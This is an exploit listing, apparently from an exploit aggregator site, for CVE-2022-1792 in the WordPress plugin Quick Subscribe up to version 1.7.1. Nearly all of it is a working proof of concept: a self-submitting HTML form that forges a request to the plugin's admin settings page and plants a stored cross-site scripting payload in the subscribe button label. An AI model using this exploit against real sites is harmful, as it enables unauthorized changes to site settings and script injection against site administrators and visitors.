Exploit for Quick Subscribe <= 1.7.1 - Arbitrary Settings Update via CSRF to Stored XSS CVE-2022-1792

Name: Exploit for Quick Subscribe <= 1.7.1 - Arbitrary Settings Update via CSRF to Stored XSS CVE-2022-1792
Rating: 5 (68 reviews)

2022-05-23 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:44555C79-480D-4B6A-9FDA-988183C06909
<form id="test" action="https://example.com/wp-admin/options-general.php?page=quicksubscribe.php" method="POST">
    <input type="text" name="button_qs" value="1">
    <input type="text" name="label_qs" value='"><img src=x onerror=alert(/XSS/)>ok'>
    <input type="text" name="tks_qs" value="Thanks for subscribing">
    <input type="text" name="submit_qs" value="Update Settings »">
</form>
<script>
    document.getElementById("test").submit();
</script>